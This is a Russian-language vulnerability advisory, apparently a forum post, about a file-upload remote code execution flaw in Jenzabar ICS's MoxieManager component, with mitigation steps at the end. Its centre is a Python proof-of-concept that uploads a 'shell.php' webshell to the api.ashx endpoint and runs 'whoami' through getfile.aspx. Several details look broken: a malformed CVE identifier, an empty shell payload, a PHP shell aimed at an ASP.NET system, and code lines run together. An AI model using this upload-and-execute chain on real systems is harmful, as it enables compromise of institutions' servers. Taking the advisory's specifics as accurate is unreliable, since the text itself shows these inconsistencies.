
CVE-2026-30-03 9.8 (Критический) Возможный RCE Jenzabar ICS + MoxieManager
CVE-2026-30-03 9.8 (Критический) Возможный RCE Jenzabar ICS + MoxieManager
proff https://www.youtube.com/watch?v=lcfUL6Xx3f4&feature=youtu.be
CVE CVSS Воздействие Затронуто CVE-2026-30-03 9.8 (Критический) Возможный RCE Jenzabar ICS + MoxieManager
Уязвимость в компоненте MoxieManager, используемом системой Jenzabar ICS, может позволить некорректную загрузку файлов, которые при определенных условиях могут быть публично доступны и потенциально привести к удаленному выполнению кода (RCE). Техническое описание
Проблема возникает из-за:
Отсутствия надлежащей проверки загружаемых файлов
Возможного раскрытия файлов через публичную конечную точку:
/ICS/staticpages/getfile.aspx
Непоследовательного контроля аутентификации в конечной точке:
/ICS/UI/Common/Scripts/tinymce/plugins/moxiemanager/api.ashx
В конкретных сценариях загруженные файлы могут сохраняться в доступных каталогах и впоследствии извлекаться.
Воздействие Произвольная загрузка файлов Раскрытие конфиденциального содержимого Возможное удаленное выполнение кода (в зависимости от конфигурации сервера) Полная компрометация системы
Классификация CVSS v3.1: 9.8 (Критический) Вектор: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-434: Загрузка файла без ограничений CWE-284: Ненадлежащий контроль доступа
PoC Exploit
#!/usr/bin/env python3
import requests
TARGET = "https://example.edu" MOXIE = f"{TARGET}/ICS/UI/Common/Scripts/tinymce/plugins/moxiemanager/api.ashx" UUID = "5d6b24cb-7bfe-4a6b-8581-4426bf0f4101"
files = {'file': ('shell.php', '', 'application/x-php')} data = {'action': 'upload', 'path': '/1085255', 'csrf': 'E24607903E4DC7496732F267BAD48FF35D855DA9E362AB80E0340D5B5EC5F164'}
r = requests.post(MOXIE, files=files, data=data) print(f"[+] Upload: {r.status_code}")
SHELL = f"{TARGET}/ICS/staticpages/getfile.aspx?target=/moxiemanager/files/users/{UUID}/shell.php" print(f"[+] Shell: {SHELL}?cmd=whoami") print(requests.get(f"{SHELL}?cmd=whoami").text)
Затронутые системы (33+ подтверждено)
Устранение Немедленные меры (смягчение):
УДАЛИТЬ /moxiemanager/files/users/*/shell.php
Ограничить getfile.aspx:
RewriteRule ^/ICS/staticpages/getfile.aspx?target=.*shell.php - [F,L]
Отключить загрузку в MoxieManager